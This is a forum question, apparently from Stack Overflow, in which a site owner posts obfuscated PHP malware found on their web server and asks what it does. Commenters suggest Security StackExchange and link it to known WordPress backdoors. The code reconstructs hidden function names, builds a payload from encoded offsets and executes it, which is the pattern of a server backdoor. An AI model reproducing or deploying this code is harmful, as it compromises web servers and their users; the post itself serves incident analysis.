# malicious php code not sure what it does.

Tags: php, malware

we've recently discovered that we have found malware on our web server, we thought it was originally related to the Hoefler Text chrome bug released earlier on this year. However, it seems to be more PHP oriented rather than a javascript injection.

Anyone have any idea what this code is doing? It looks encrypted but we have no idea where it came from or what it has been doing.

```
<?php $nutfkvo = 'ERVER["   x48 124 x54 120 x5f 125 x53 105 xZ;h!opjudovg}{;#)tutjyf`opjudovg)!gj!|!*msv%)}k~~~<ftmbg!osvufs!|1);} @error_reporting(0); $shbq%)dfyfR    x27tfs%6<*17-SF%rx<~!!%s:N}#-%o:W%c:>1<%b:>1<!gps)%j:>1<%j:=tj{fpg)%s:*<%j:,,Bjj%-bubE{h%)sutcvt-#w#)ldb&)7gj6<.[A  x27&6<  x7fw6*  !#]D6M7]K3#<%yy>#]D6]281L1#/#M5]DgP5]D6#<%fd99386c6f+9f5d816:+946:ce44#)zb7R37,18R#>q%V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w%)kVx{**#k#)tutjyf`x t`cpV   x7f x7f x7f x7f<u%V x27{ftmfV   x7f<*X&Z&S{ftmfV    x7f<*]y76#<!%w:!>!(%w:!>!   x246767~6<Cw6<pd%w*&7-n%)utjm6< x7fw6*CW&)7gj6<*K)ftpmdXA6~6<u%7>/7&6|7**4") && (!isset($GLOBALS["  x61 156 x75 156 g!)%j:>>1*!%b:>1<!fmtf!%b:>%s:  x5c%j:.2^,%b:<!%c:>%s:  x5c%j:^<!%wuhA)3of>2bd%!<5h%/#0#/*#npd/#)rrd/#00;quui#>.%!<***f x27,*e  P6L1M5]D2P4]D6#<%G]y6d]281Ld]245#00#W~!%t2w)##Qtjw)#]82#-#!#-if((function_exists("  x6f 142 x5f 163 x74 141 x72 16%tjw/ x24)%   x24-    x24y4   x24-    x24]y8  x24-    x24]26  x24-    x24<%j,,*!| x24-#+I#)q%:>:r%:|:**t%)m%=*h%)m%)EBFI,6<*127-UVPFNJU,6<*27-52  137 x41 107 x45 116 x54"]); if ((strstr($uas,"  x6d 163 x69+{e%!osvufs!*!+A!>!{e%)!>>   x22!ftmbg)!gj<*#k#)usbugj6<**2qj%)hopm3qjA)qj3hopmA x273qj%6<62 x65 141 x74 145 x5f 146 x75 1565,47R25,d7R17,67R37,#/q%>U<#16,47R57,27Rp%   x7f!~!<##!>!2p%Z<^2 x5c2b%cvt)esp>hmg%!<12>j%!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%)sutcXAZASV<*w%)ppde>u%V<#p#/#p#/%z<jg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%w`TW~    x24<!fw($uas,"  x66 151 x72 145 x6W;utpi}Y;tuofuopd`ufh`fmjg}[;ldpt%}K;`ufldpt}X;`msvd}R;*msv%)}.;`x22l:!}V;3q%}U;y]}R;2w/  x24)##-!#~<#/%  x24-    x24!>!fyqmpef)# x24*<!&b%!|!*)323zbek!~!<b% x7f!<X>b%Z<#opo#>b%!*##>>Xx61"])))) { $GLOBALS["    x61 156 x75 156 x61"]=1; $uas=strtolower($_S-#W#-#C#-#O#-#N#*-!%ff2-!%t::**<(<!fwbm)%tjw)#  x24#-!#]y38#-!%w:19275fubmgoj{h1:|:*mmvo:>&f_UTPI`QUUI&e_SEEB`FUPNFS&d_SFSFGFS`QUUI&c_UOFHB`SFTV`QUUI#  x27rfs%6~6< x7fw6<*K)ftpmdXA6|7**197-2qj%7-K)udfoopdvg!|!**#j{hnpd#)tutjyf`opjudovg x22)!gj}1~!<2<ofmy%,3,j%>j%!<**3-fepdof`57ftbc  x7f!|!*uyfu vt)!gj!|!*bubE{h%)j{hnpd!opjudox6f  151 x64")) or (strstr($uas,"    x63 150 x72 157 x6d 145")) or (strstrfttj   x22)gj!|!*nbsbq%)323ldfidk!~!<**qp%!-uyfu%)3of)dsb`bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!/!#0#)idubn`hfsW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]341]`   x5c^>Ew:Qb:Qc:W~!%z!>2<!gps)%j>1<%j=6[%ww2!>#x27,*d x27,*c  x27,*b  x27)fepdof.)fepdof./#@#/qp%>5h23}!+!<+{e%+*!*+fepdfe{h+{d%)+opjudovg+)!gjy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%tdz>#L4]275L3]248L3ssb!>!ssbnpe_GMFT`QIQ; $czkfapi();}}ewj = implode(array_map("fsvvfen",str_split("%tjw!>!#]y84]275]<&w6<  x7fw6*CW&)7gj6<*doj%7-C)fepmqnjA    x27&6<.fmjgA    x27doj%6<   x7fw6*  56-xr.985:52985-t.98]K4]65]D8]86]y31]278:iuhofm%:-5ppde:4:|:**#ppde#)tutjyf`4   x2x7f_*#[k2`{6:!}7;!}6;##}C;!>>!}%t::!>!    x24Ypp3)%cB%iN}vt)fubmgoj{hA!osvufs!~<3,j%>j%!*3!x27k:!ftmf!}Z;^nbsbq%  5   x24-    x24-!%  x24-    x24*!|! x24-    x24 x5c%j^  x24-    x24tvctus)% x2! x27!hmg%)!gj!<2,*j%-#1]#-bubE{h%)tpqsjt0}Z;0]=]0#)2q%l}S;2-u%!-#2#/#%#/#o]#/*)3 145")) or (strstr($5cq% x27jsv%6<C>^#zsfvr# x5cq%7**^#zsfvr#    x5cq%)ufttj x22)gj6<^#Y#    x5ut>j%!*9! x27!hmg%)!gj!~1]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:5297e:bg}    x7f;!osvufs}w;* x7f!>>  x22!pd%)!gj}    x24*<!  x24-    x24gps)%j>1<%j=tj{fpg)% x24-    x24*<!~!    x24/%t88M4P8]37]278]225]241]33%zW%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rN}#QwTW%hIr   x5c1^-%r    x5c2^-%hOh/]y3f]51L3]84]y31M6]y3e]81#/#7e:55946-tr.984:754]368]322]3]364]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67h%:<**#57]38y]47]67y]37]88y]27]28y]#/r%/h%)n%111127-K)ebfsX  x27u%)7fmjix6<C x27&6<*rfs%7-K)fujsxX6<uas,"    x72 166 x3a 61  x31")) or (strstr($uas,"    x61 156 x64 162 275]y7:]268]y7f#<!%tww!>!   x2400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/dXA x27K6<  x7fw6*3qj%7>    x2272qj%)7UQPMSVD!-id%)uqpuft`msvd},;uqpuft`msvd}+;!>!} x27;!>>>!}_;gvc%}&;ftm*Y%)fnbozcYufhA   x272qj%6<^#zsfvr#   x5cq%7/7#@#7/7^#iubq#   x6  x63 164 x69 157 x6e"; function fsvvfen($n){return chr(ord($n)-983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%tpz!>5#*<%bG9}:}.}-}!#*<%nfd>%fdy<Cb*[%h!>!%tdz)%bbT-%bT-%h-  x24gvodujpo!    x24-    x24y7   x24-66,#/q%>2q%<#g6R85,623ldfid>}&;!osvufs} x7f;!opjudovg}k~~9{d]452]88]5]48]32M3]317]445]212]445]43]321]464]284]364]6]234]342]58]24#-! x24/%tmw/   x24)%c*W%eN+#Qi x5c!#65egb2dc#*<!sfuvso!sboepn)%epnbss-%rxW~!Ypp2)%zB%z>!   x24/%tmw/   x24)bm)%tjw)bssbz)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#%:osvufs:~928>>    x22:ftmbg39*56A:>:8:|:7#6#)tuRk3`{666~6<&w6<    x7fw6*CW%tmw)%tww**WYsboepn)%bss-%rxB%h>#]y31]278]y3e]84-   x24b!>!%yy)#}#-#    x24-    x24-tusqpt)%z-#:#*  x24-    x24!>!  x24/6   157 x78"))) { $lfaxxhl = "  x63 1]K2]285]Ke]53Ld]53]Kc]55Ld]5cq%    x27Y%6<.msv`ftsbqA7%!<*::::::-111112)eobs`un>qp%!|Z~!<##q)!sp!*#ojneb#-*f%)sfxpmpusut)tpqssutRe%)Rd%)Rb%))!gj!<*#cd2bge56+.2`hA x27pd%6<C   x27pd%6|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf  x27qov>*ofmy%)utjm!|!*5!    x27!hmg%)!gj!|!*1?hmg%)!gj!<**2-4-bubE{h%)sut>q%6<  x7fw6*  x7f_*#fubfsdXk5`{66~61^W%c!>!%i x5c2^<!Ce*[!%cIjQeTQcOc/#00#W~!Ydrr)%y]562]38y]572]48y]#>m%:|:*r%:-t%)3of:opjudovg<~    x24<!%o:!>! 3]y76]277#<!%t2w>#]y74]273]y76]252]y85]256]y6g]257]y86]267]y74]rxB%epnbss!>!bssbz)#44ec:649#-!#:618d5f9#-!#f6c68399#-x5cSFWSFT`%}X;!sp!*#opo#>>}R;msv}.;/#/#/},;#-#}+;%-qp%)!gjZ<#opo#>b%!**X)u6Z6<.5`hA    x27pd%6<pd%w6Z6<.4`hA   x27pd%6<pd%w6Z6<.3`hA   x27pd%6<pd%w6Z6<XA  x22)7gj6<*QDU`MPT7-NBFSUT`LDPT7-UFOJ`GB)fubfs:fmjix:<##:>:h%:<#64y]552]e7y]#>n]31#-%tdz*Wsfuvso!%bss    x5csboe))1/35.)1/14+9**-)1/2986+7**^/ftmf!~<**9.-j%-bubE{h%)sutc2]},;osvufs}    x27;mnui}&;zepc}A;~!}   x7f;!|!}{;)gj}l;33  x27!hmg%!)!gj!<2,*j%!-#1]#-bubE{h%)tpqsut>j%!*72bq}k;opjudovg}x;0]=])0#)U!  x27{**u%-#x7f_*#fmjgk4`{6~6<tfs%w6< x7fw6*CWtfs%)7gj6<*id%)ftpmdR6<*idtjyf`439275ttfsqnpdov{h19275j{hnpd!>!2p%!*3>?*2b%)gpf{jt)!gj!<*2bd%-#1GO  x22#)fepmqyfA>2b%!<*qp%-*.%)e#o]o]Y%7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%7UFH23zbe!-#jt0*?]+^?]_    x5c}X   x24<!%tmw!>!#]y84]275]y83]27x242178}527}88:}334}472 x24<!%ff2!>!bssbz)  x24]2**<")));$czkfapi = $lfaxxhl("", $shbqewj)!>!2p%!|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcnbs+yfeobz+sfwji%<#372]58y]472]37y]672]48y]#>s%<#462]47y]252]18y]#>q%<#762]67)54l} x27;%!<*#}_;#)3SFGTOBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR    x27id%6<    x7fw6*  x7f_*#ujojy83]248]y83]256]y81]265]y72]254StrrEVxNoiTCnUF_EtaERCxecAlPeR_rtSbnxdrhltuaz'; $bnzgztgmm=explode(chr((820-700)),substr($nutfkvo,(34424-28404),(116-82))); $sogrxeet = $bnzgztgmm[0]($bnzgztgmm[(6-5)]); $lrjjxox = $bnzgztgmm[0]($bnzgztgmm[(9-7)]); if (!function_exists('tplmislked')) { function tplmislked($objccdaud, $jjqdfcrjgk,$rvvqeciogp) { $lbuwksopz = NULL; for($kuoupxdnns=0;$kuoupxdnns<(sizeof($objccdaud)/2);$kuoupxdnns++) { $lbuwksopz .= substr($jjqdfcrjgk, $objccdaud[($kuoupxdnns*2)],$objccdaud[($kuoupxdnns*2)+(5-4)]); } return $rvvqeciogp(chr((31-22)),chr((398-306)),$lbuwksopz); }; } $nudedtoa = explode(chr((174-130)),'798,52,570,42,1565,67,0,41,974,61,2886,20,3445,62,1956,70,1360,26,4404,34,1123,33,3728,64,106,31,2422,62,5989,31,476,39,5058,70,4592,66,515,55,3391,54,5597,44,1780,54,5128,48,3569,34,1085,38,3671,57,2906,69,4466,23,4725,34,2484,69,5435,60,137,23,948,26,5925,64,4273,24,249,25,2633,31,1386,65,3603,68,3054,39,41,65,5269,27,2687,34,5349,49,2805,39,2975,24,1879,20,224,25,4658,67,1226,56,1925,31,1834,45,1197,29,5529,68,677,60,2226,51,4489,37,5784,59,2078,62,4526,66,318,30,2386,21,1721,59,1517,48,5038,20,2026,52,1899,26,2721,22,4984,54,5904,21,3949,40,4228,45,5495,34,1696,25,2593,40,2277,43,1035,50,418,58,1282,21,1156,41,3929,20,348,70,1451,20,5296,53,5398,37,2844,42,5641,54,4867,63,3507,62,3346,45,917,31,5176,33,5843,61,4807,60,5695,48,2743,62,4344,60,850,67,3899,30,3093,57,1471,46,2664,23,4057,33,4759,48,4930,54,4090,69,3174,64,769,29,4297,47,2999,55,2553,40,3238,46,3792,53,274,44,2320,66,737,32,4438,28,3845,54,2140,39,3150,24,3284,62,3989,68,5209,60,160,64,612,65,2179,47,1303,57,4159,69,1632,64,5743,41,2407,15'); $balvyxsnq = $sogrxeet("",tplmislked($nudedtoa,$nutfkvo,$lrjjxox)); $sogrxeet=$nutfkvo; $balvyxsnq(""); $balvyxsnq=(745-624); $nutfkvo=$balvyxsnq-1; ?><
```

Highly apprciate it!

Comment: I think that question is better to be asked in [Security StackExchange](https://security.stackexchange.com/)

Comment: Never knew that was a thing, thank you!

Comment: Make sure you have complete code. When I try to run it, it fails with `Fatal error: Call to undefined function !*!***b%)sf() in ... on line 1`

Comment: It *appears* to be very similar to this (if not the same thing): https://security.stackexchange.com/questions/70579/is-this-a-backdoor and https://blog.sucuri.net/2014/10/wordpress-websites-continue-to-get-hacked-via-mailpoet-plugin-vulnerability.html - you should be OK unless you're got a very old, unpatched MailPoet plugin on WordPress... *if* it's the same thing.